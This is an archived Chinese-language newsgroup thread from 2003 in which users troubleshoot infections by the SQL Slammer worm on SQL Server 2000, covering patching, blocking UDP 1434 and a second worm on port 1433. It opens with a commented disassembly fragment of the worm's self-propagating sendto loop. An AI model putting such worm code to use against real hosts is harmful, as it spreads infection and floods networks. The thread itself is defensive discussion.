1ac: 89 45 b4 mov %eax,0xffffffb4(%ebp)
1af: 6a 10 push $0x10 # length of the sockaddr
1b1: 8d 45 b0 lea 0xffffffb0(%ebp),%eax # b0 is where sockaddr starts
1b4: 50 push %eax # push sockaddr
1b5: 31 c9 xor %ecx,%ecx
1b7: 51 push %ecx # flags - none
1b8: 66 81 f1 78 01 xor $0x178,%cx # 376 bytes; the length
1bd: 51 push %ecx
1be: 8d 45 03 lea 0x3(%ebp),%eax # get the beginning of the buffer
1c1: 50 push %eax # push addr
1c2: 8b 45 ac mov 0xffffffac(%ebp),%eax # get socket handle
1c5: 50 push %eax #
1c6: ff d6 call *%esi # call sendto
1c8: eb ca jmp 0x194 # jump back and do this again
_________________
駭客人間
http://mydear.sytes.net/phpbbhackzone/


我是大笨蛋

unread,
Jan 25, 2003, 11:35:43 PM1/25/03
to
【 在 yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角) 的大作中提到: 】
: http://www.cert.org.tw/news/030125.php
: 不是被攻擊,看這,最新的安全通告

唉~我的機器也中標了,昨天流量衝到快5MB....
上了sal 2k sp3好像也沒啥用....怎會這樣?>_<
--
今宵酒醒何處 , 楊柳岸 , 曉風殘月 .......

[m [1;31m※ 來源:‧靜宜大學計算機中心bbs站 bbs.pu.edu.tw‧[FROM: 211.78.241.86] [m

Nanika

unread,
Jan 26, 2003, 12:31:09 AM1/26/03
to

因為此蠕蟲~~只要有機器尚未修補SQL漏洞~~就可以攻擊~~
而~~他所發送的封包~~又是~~利用此漏洞的攻擊封包
~~並且又是隨機發送~~所以~~沒修補漏洞的~~就~接一連三的~~
發送~~~你可以考慮先關掉1434 UDP
等待內部主機~~或尋找內部主機~~修補漏洞~~停止攻擊漏在開啟


傲笑紅塵是主角

unread,
Jan 26, 2003, 12:36:47 AM1/26/03
to
※ 引述《minja...@yahoo.com.tw (Nanika)》之銘言:

Re:只要注意有裝SQL Server 2000的機器就可以,先停下 Service
裝好 SQL Service Pack 3,就可
不過自己內部網路的 SQL做好,並不能訪止外面人家的機器來做
DDOS的攻擊,所以他們才建議先在 Firewall把 UDP 1434封包過濾掉
讓自己公司內部的 SQL無法去攻擊別人也防止別人的封包攻擊你


--
[1;32m※ Origin: [33m交大資工鳳凰城資訊站 [37m<bbs.csie.nctu.edu.tw> [m

[1;31m◆ From: [36mswtp216-90.adsl.seed.net.tw [m

我是大笨蛋

unread,
Jan 26, 2003, 1:40:15 AM1/26/03
to
【 在 yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角) 的大作中提到: 】
: ※ 引述《minja...@yahoo.com.tw (Nanika)》之銘言:

: > 因為此蠕蟲~~只要有機器尚未修補SQL漏洞~~就可以攻擊~~
: > 而~~他所發送的封包~~又是~~利用此漏洞的攻擊封包
: > ~~並且又是隨機發送~~所以~~沒修補漏洞的~~就~接一連三的~~
: > 發送~~~你可以考慮先關掉1434 UDP
: > 等待內部主機~~或尋找內部主機~~修補漏洞~~停止攻擊漏在開啟
: Re:只要注意有裝SQL Server 2000的機器就可以,先停下 Service
: 裝好 SQL Service Pack 3,就可
: 不過自己內部網路的 SQL做好,並不能訪止外面人家的機器來做
: DDOS的攻擊,所以他們才建議先在 Firewall把 UDP 1434封包過濾掉
: 讓自己公司內部的 SQL無法去攻擊別人也防止別人的封包攻擊你

小弟裝了SP3,不過看來好像還是沒有用?
看firewall的log發現是server 一直掃外面的ip (dst port=1433 不是1434)

該不會是還有中其他的病毒吧?

唉......


--
今宵酒醒何處 , 楊柳岸 , 曉風殘月 .......

[m [1;32m※ 來源:‧靜宜大學計算機中心bbs站 bbs.pu.edu.tw‧[FROM: 218-167-4-75.HINET-I] [m

我是大笨蛋

unread,
Jan 26, 2003, 1:48:11 AM1/26/03
to
【 在 yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角) 的大作中提到: 】
: ※ 引述《minja...@yahoo.com.tw (Nanika)》之銘言:
: > 因為此蠕蟲~~只要有機器尚未修補SQL漏洞~~就可以攻擊~~
: > 而~~他所發送的封包~~又是~~利用此漏洞的攻擊封包
: > ~~並且又是隨機發送~~所以~~沒修補漏洞的~~就~接一連三的~~
: > 發送~~~你可以考慮先關掉1434 UDP
: > 等待內部主機~~或尋找內部主機~~修補漏洞~~停止攻擊漏在開啟
: Re:只要注意有裝SQL Server 2000的機器就可以,先停下 Service
: 裝好 SQL Service Pack 3,就可
: 不過自己內部網路的 SQL做好,並不能訪止外面人家的機器來做
: DDOS的攻擊,所以他們才建議先在 Firewall把 UDP 1434封包過濾掉
: 讓自己公司內部的 SQL無法去攻擊別人也防止別人的封包攻擊你

趨勢解毒程式:
http://www.trend.com.tw/vinfo/virusencyclo/default5.asp?VName=WORM_SQLP1434.A

good luck

Nanika

unread,
Jan 26, 2003, 2:46:55 AM1/26/03
to

"傲笑紅塵是主角" <yamm...@bbs.csie.nctu.edu.tw> 撰寫於郵件新聞
:44S5al$S...@bbs.csie.nctu.edu.tw...
> ※ 引述《minja...@yahoo.com.tw (Nanika)》之銘言:

> Re:只要注意有裝SQL Server 2000的機器就可以,先停下 Service
> 裝好 SQL Service Pack 3,就可
> 不過自己內部網路的 SQL做好,並不能訪止外面人家的機器來做
> DDOS的攻擊,所以他們才建議先在 Firewall把 UDP 1434封包過濾掉
> 讓自己公司內部的 SQL無法去攻擊別人也防止別人的封包攻擊你
> --
> [1;32m※ Origin: [33m交大資工鳳凰城資訊站 [37m<bbs.csie.nctu.edu.tw>
[m
> [1;31m◆ From: [36mswtp216-90.adsl.seed.net.tw [m

你說的沒有錯~~是不能防止外部IP攻擊~~但是~~如果有裝防火牆的網路~~設定良好的話
~~外部通常沒有辦法進入~內部IP~UDP1434~


活著

unread,
Jan 27, 2003, 1:04:26 AM1/27/03
to
※ 引述《Besse...@bbs.nsysu.edu.tw (我將歸來開放)》之銘言:

> > 因為此蠕蟲~~只要有機器尚未修補SQL漏洞~~就可以攻擊~~
> > 而~~他所發送的封包~~又是~~利用此漏洞的攻擊封包
> > ~~並且又是隨機發送~~所以~~沒修補漏洞的~~就~接一連三的~~
> > 發送~~~你可以考慮先關掉1434 UDP
> > 等待內部主機~~或尋找內部主機~~修補漏洞~~停止攻擊漏在開啟
> 我這學期剛修資料庫
> 老師建議我們用SQL 2000
> 灌沒多久就中獎了
> 微軟的產品最普遍
> 成為駭客下手的目標是可以理解的
> 可是微軟公司本身應該也有所體認吧?
> 他們只對這次攻擊表示遺憾
> 並說早就發佈此漏洞,要使用者自行去下載 修正版
> 他們每次都是 這樣的態度
> 以後決定改用MySQL了

去年就發怖的漏洞 跟 Patch 你到了半年後還甚麼都沒有做?

該怪的是自己 不是微軟

你用Mysql 你有洞不補 到時候還是一樣死

那你再來怪別人?


--

[1;37m牧場 BBS : [32mChuee.twbbs.org [m

[1;37m歡迎來參觀 :) [m

--
[1;32m□ Origin: [37m牧場 - alstom.adsldns.org [31m□ From: [36m203.73.181.202 [m

想太多-.-

unread,
Jan 27, 2003, 2:29:46 AM1/27/03
to
※ 引述《fool...@bbs.pu.edu.tw (我是大笨蛋)》之銘言:
> 【 在 yamm...@bbs.csie.nctu.edu.tw (傲笑紅塵是主角) 的大作中提到: 】
> : Re:只要注意有裝SQL Server 2000的機器就可以,先停下 Service

> : 裝好 SQL Service Pack 3,就可
> : 不過自己內部網路的 SQL做好,並不能訪止外面人家的機器來做
> : DDOS的攻擊,所以他們才建議先在 Firewall把 UDP 1434封包過濾掉
> : 讓自己公司內部的 SQL無法去攻擊別人也防止別人的封包攻擊你
> 小弟裝了SP3,不過看來好像還是沒有用?
> 看firewall的log發現是server 一直掃外面的ip (dst port=1433 不是1434)
> 該不會是還有中其他的病毒吧?
> 唉......
1433是另外一隻病毒,趨勢叫它"JS_SQLSPIDA.B".
--
※ Origin: 楓橋驛站<bbs.cs.nthu.edu.tw> ◆ From: 218-164-27-81.HINET-IP.hinet.net

DANTE

unread,
Jan 27, 2003, 10:02:33 AM1/27/03
to

> 他們每次都是 這樣的態度
> 以後決定改用MySQL了


你以為MySQL就沒有bug???
這是不可能的..
每次的更新都是在修補錯誤和新增該有的功能
不是神..只要人寫的程式沒人敢說自己的程式沒有bug

ps:搞不好hello world也有^^
--
※ Origin: 楓橋驛站<bbs.cs.nthu.edu.tw> ◆ From: 61-216-17-139.HINET-IP.hinet.net

Palatis

unread,
Jan 27, 2003, 12:10:12 PM1/27/03
to
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

我將歸來開放 wrote:

>> ==> minja...@yahoo.com.tw (Nanika) 的文章中提到:


>> 因為此蠕蟲~~只要有機器尚未修補SQL漏洞~~就可以攻擊~~
>> 而~~他所發送的封包~~又是~~利用此漏洞的攻擊封包
>> ~~並且又是隨機發送~~所以~~沒修補漏洞的~~就~接一連三的~~
>> 發送~~~你可以考慮先關掉1434 UDP
>> 等待內部主機~~或尋找內部主機~~修補漏洞~~停止攻擊漏在開啟
>
> 我這學期剛修資料庫
> 老師建議我們用SQL 2000
> 灌沒多久就中獎了
>
> 微軟的產品最普遍
> 成為駭客下手的目標是可以理解的
> 可是微軟公司本身應該也有所體認吧?
> 他們只對這次攻擊表示遺憾
> 並說早就發佈此漏洞,要使用者自行去下載 修正版
> 他們每次都是 這樣的態度
>
> 以後決定改用MySQL了
>

...
印證一句老話 -- "世界上沒有爛系統, 只有笨使用者."

笨使用者, 用什麼東西都彆手彆腳;
聰明的使用者, 即使是不怎麼樣的系統也可以發揮最高效能 (efficiency).

SQL 2000 是個好灌好管的資料庫, 功能也齊全, 可是效能安全跟穩定度就...
Windows 版本的 MySQL 要花錢, 而且功能也不齊.
真的想用全功能高效率的 SQL Server, 可以試試看 PgSQL!

- --
最好的是男人 (man) ~~
請善用 Google (http://www.google.com) ~~

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+NWf23zkHylOtwZ8RAuB8AJ9jHpux1EoXAPpFufyXQmWhlICmPQCfc+HC
N4fcjebgzRccSeMKI/6Q/NM=
=IKm2
-----END PGP SIGNATURE-----

想太多-.-

unread,
Jan 27, 2003, 12:17:38 PM1/27/03
to
※ 引述《DANTE (DANTE)》之銘言:

> > 他們每次都是 這樣的態度
> > 以後決定改用MySQL了
> 你以為MySQL就沒有bug???
> 這是不可能的..
> 每次的更新都是在修補錯誤和新增該有的功能
> 不是神..只要人寫的程式沒人敢說自己的程式沒有bug
> ps:搞不好hello world也有^^
Hello wrold該不會hello到buffer overflow吧@@
--
※ Origin: 楓橋驛站<bbs.cs.nthu.edu.tw> ◆ From: 218-164-27-81.HINET-IP.hinet.net

遺憾

unread,
Jan 27, 2003, 8:56:05 PM1/27/03
to
《 在 Besse...@bbs.nsysu.edu.tw (我將歸來開放) 的大作中提到: 》
: > ==> minja...@yahoo.com.tw (Nanika) 的文章中提到:

: > 因為此蠕蟲~~只要有機器尚未修補SQL漏洞~~就可以攻擊~~
: > 而~~他所發送的封包~~又是~~利用此漏洞的攻擊封包
: > ~~並且又是隨機發送~~所以~~沒修補漏洞的~~就~接一連三的~~
: > 發送~~~你可以考慮先關掉1434 UDP
: > 等待內部主機~~或尋找內部主機~~修補漏洞~~停止攻擊漏在開啟
: 我這學期剛修資料庫
: 老師建議我們用SQL 2000
: 灌沒多久就中獎了
: 微軟的產品最普遍
: 成為駭客下手的目標是可以理解的
: 可是微軟公司本身應該也有所體認吧?
: 他們只對這次攻擊表示遺憾
: 並說早就發佈此漏洞,要使用者自行去下載 修正版
: 他們每次都是 這樣的態度
: 以後決定改用MySQL了

講一句實話啦
以您這種態度
用什麼都難逃被攻擊的命運
先檢討一下
為什麼出了半年的修正檔
你會沒有安裝


--
[m [1;34m※ 來源:‧蛋捲廣場 bbs.tku.edu.tw‧[FROM: 203.66.229.6] [m

我是大笨蛋

unread,
Jan 28, 2003, 5:59:21 AM1/28/03
to
【 在 yugibe...@bbs.tku.edu.tw (遺憾) 的大作中提到: 】
: 《 在 Besse...@bbs.nsysu.edu.tw (我將歸來開放) 的大作中提到: 》
: : 我這學期剛修資料庫

: : 老師建議我們用SQL 2000
: : 灌沒多久就中獎了
: : 微軟的產品最普遍
: : 成為駭客下手的目標是可以理解的
: : 可是微軟公司本身應該也有所體認吧?
: : 他們只對這次攻擊表示遺憾
: : 並說早就發佈此漏洞,要使用者自行去下載 修正版
: : 他們每次都是 這樣的態度
: : 以後決定改用MySQL了
: 講一句實話啦
: 以您這種態度
: 用什麼都難逃被攻擊的命運
: 先檢討一下
: 為什麼出了半年的修正檔
: 你會沒有安裝

嗯~沒有不安全的系統只有不安全的人.....


--
今宵酒醒何處 , 楊柳岸 , 曉風殘月 .......

[m [1;32m※ 來源:‧靜宜大學計算機中心bbs站 bbs.pu.edu.tw‧[FROM: 211.78.241.86] [m

叫流行來追我 ^_^

unread,
Jan 28, 2003, 11:51:16 PM1/28/03
to
《 在 fool...@bbs.pu.edu.tw (我是大笨蛋) 的大作中提到: 》
: 【 在 yugibe...@bbs.tku.edu.tw (遺憾) 的大作中提到: 】

: : 《 在 Besse...@bbs.nsysu.edu.tw (我將歸來開放) 的大作中提到: 》
: : : 我這學期剛修資料庫
: : : 老師建議我們用SQL 2000
: : : 灌沒多久就中獎了
: : : 微軟的產品最普遍
: : : 成為駭客下手的目標是可以理解的
: : : 可是微軟公司本身應該也有所體認吧?
: : : 他們只對這次攻擊表示遺憾
: : : 並說早就發佈此漏洞,要使用者自行去下載 修正版
: : : 他們每次都是 這樣的態度
: : : 以後決定改用MySQL了
: : 講一句實話啦
: : 以您這種態度
: : 用什麼都難逃被攻擊的命運
: : 先檢討一下
: : 為什麼出了半年的修正檔
: : 你會沒有安裝
: 嗯~沒有不安全的系統只有不安全的人.....
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
這句是錯的,沒有一個系統是安全的,問題是出現在人,一個好的管理者應該是要每天
看系統log....查一下修正程式發行,有那些系統問題被發現,而不是電腦一裝好就
放在那不管.......還有一點是要有備份的觀念..很重要的

--
[m [1;35m※ 來源:‧蛋捲廣場 bbs.tku.edu.tw‧[FROM: 211.21.39.70] [m

Reply all
Reply to author
Forward
0 new messages